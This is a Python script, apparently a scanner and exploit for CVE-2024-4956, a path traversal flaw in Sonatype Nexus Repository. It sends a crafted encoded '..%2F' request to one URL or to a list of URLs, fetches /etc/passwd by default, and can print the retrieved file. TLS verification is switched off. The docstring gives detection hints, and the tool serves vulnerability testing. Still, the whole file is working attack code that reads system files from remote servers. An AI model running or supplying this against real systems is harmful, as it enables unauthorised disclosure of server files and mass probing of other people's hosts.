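"""Checker for CVE-2024-4956, a path traversal in Sonatype Nexus Repository.

For each target URL the script sends one GET request whose path is built from
repeated ``%2F`` separators followed by ``..%2F`` segments and the requested
file path, then reports whether a marker string appears in the response.

Detection note: the probe is recognisable in web or proxy access logs by the
run of ``%2F`` / ``..%2F`` sequences in the request path and by the fixed
``Mozilla/5.0 LoL`` User-Agent set below.
"""
import argparse
from urllib.parse import urlparse

import requests
import urllib3
from colorama import Fore, Style, init

# Certificate validation is turned off for the probe (verify=False below), so
# the matching urllib3 warning is silenced to keep the output readable.
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
init(autoreset=True)

# Seconds to wait for a target before giving up; without a timeout a single
# unresponsive host would block the whole run.
REQUEST_TIMEOUT = 10

# Encoded prefix placed in front of the requested file path.
TRAVERSAL_PREFIX = "%2F%2F%2F%2F%2F%2F%2F..%2F..%2F..%2F..%2F..%2F..%2F.."


def print_banner():
    """Print the tool banner."""
    banner = """
    ###############################################
    #     CVE-2024-4956 - Nexus PATH Traversal    #
    #                  @merlax_                   #
    ###############################################
    """
    print(banner)


def encode_directory(directory):
    """Return *directory* with every ``/`` replaced by ``%2F``."""
    return directory.replace("/", "%2F")


def make_request(host, directory, match_string, show_response,
                 timeout=REQUEST_TIMEOUT):
    """Probe one target and print whether it looks vulnerable.

    Args:
        host: Base URL of the target, including the scheme.
        directory: Absolute path of the file requested through the traversal.
        match_string: Text expected in the body when the file was returned.
        show_response: When true, print the response body on a positive hit.
        timeout: Seconds to wait for the server before reporting an error.

    A target is reported as vulnerable only when the final response has
    status 200 *and* the body contains ``match_string``. Matching on the body
    alone misreports error pages that happen to contain the marker text.
    """
    # Drop trailing slashes so the joined URL does not gain an extra "/".
    base_url = host.rstrip("/")
    nethost = urlparse(base_url).netloc
    url = f"{base_url}/{TRAVERSAL_PREFIX}{encode_directory(directory)}"
    headers = {
        'Host': nethost,
        'User-Agent': 'Mozilla/5.0 LoL',
    }

    try:
        # verify=False lets the check run against instances with self-signed
        # certificates; the response is therefore not authenticated by TLS.
        response = requests.get(url, headers=headers, verify=False,
                                timeout=timeout)
    except requests.exceptions.RequestException as e:
        print(f"{Fore.RED}[-] Error en {host}: {e}{Style.RESET_ALL}")
        return

    if response.status_code == 200 and match_string in response.text:
        print(f"{Fore.GREEN}[+] VULNERABLE: {host}{Style.RESET_ALL}")
        if show_response:
            print(response.text)
    else:
        print(f"{Fore.RED}[-] No Vulnerable: {host}{Style.RESET_ALL}")


def main():
    """Parse the command line and check a single URL or a file of URLs."""
    parser = argparse.ArgumentParser(
        description='CVE-2024-4956 - Nexus PATH Traversal Checker')
    parser.add_argument('-s', '--single', help='URL individual')
    parser.add_argument('-f', '--file', help='Archivo con URLs')
    parser.add_argument('-d', '--directory', default='/etc/passwd',
                        help='Directorio a incluir en el request')
    parser.add_argument('-m', '--match-string', default='nexus',
                        help='Cadena a buscar en la respuesta (en caso de modificar el archivo con -d)')
    parser.add_argument('-r', '--show-response', action='store_true',
                        help='Mostrar archivo accedido')

    args = parser.parse_args()

    print_banner()

    if args.single:
        make_request(args.single, args.directory, args.match_string,
                     args.show_response)
    elif args.file:
        # One target URL per line; blank lines are skipped.
        with open(args.file, 'r', encoding='utf-8') as f:
            for line in f:
                host = line.strip()
                if host:
                    make_request(host, args.directory, args.match_string,
                                 args.show_response)
    else:
        print("Debe proporcionar una URL (-s) o un archivo con URLs (-f).")


if __name__ == '__main__':
    main()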